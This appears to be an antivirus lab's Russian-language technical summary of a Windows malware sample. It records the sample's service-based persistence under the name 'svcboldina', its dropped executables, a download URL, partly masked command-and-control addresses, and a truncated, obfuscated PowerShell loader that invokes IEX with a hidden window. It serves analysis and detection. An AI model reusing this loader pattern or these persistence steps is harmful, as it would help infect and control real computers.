Техническая информация
- [HKLM\System\CurrentControlSet\Services\svcboldina] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\svcboldina] 'ImagePath' = '"%WINDIR%\SysWOW64\svcboldina.exe"'
- 'svcboldina' "%WINDIR%\SysWOW64\svcboldina.exe"
- 'svcboldina' %WINDIR%\SysWOW64\svcboldina.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $SHElLid[1]+$shELLId[13]+'X')( [STRiNg]::joIn('', ([cHaR[]] (1,74, 76 ,104 , 24, 75,64, 82, 8 ,74, 71 , 79 , 64 ,70,81 ,5 , 107 , 64, 81 ,11 ,114 ,64,71 , 102 ,73, 76,64,75 ,81 , 30, 1 ,95,...
- %WINDIR%\syswow64\svcboldina.exe
- %TEMP%\550.exe
- %TEMP%\550.exe в %WINDIR%\syswow64\svcboldina.exe
- 'ja###nsart.com':80
- '18#.#97.62.222':443
- '15#.#37.93.131':20
- '12.##9.72.170':80
- '10#.#1.20.17':80
- '11#.#42.247.110':80
- '13#.#28.77.144':80
- '27.##9.24.214':443
- http://ja###nsart.com/cMn6Qso1ny/
- DNS ASK op###vet.com
- DNS ASK ja###nsart.com
- '%TEMP%\550.exe'
- '%WINDIR%\syswow64\svcboldina.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $SHElLid[1]+$shELLId[13]+'X')( [STRiNg]::joIn('', ([cHaR[]] (1,74, 76 ,104 , 24, 75,64, 82, 8 ,74, 71 , 79 , 64 ,70,81 ,5 , 107 , 64, 81 ,11 ,114 ,64,71 , 102 ,73, 76,64,75 ,81 , 30, 1 ,95,...' (со скрытым окном)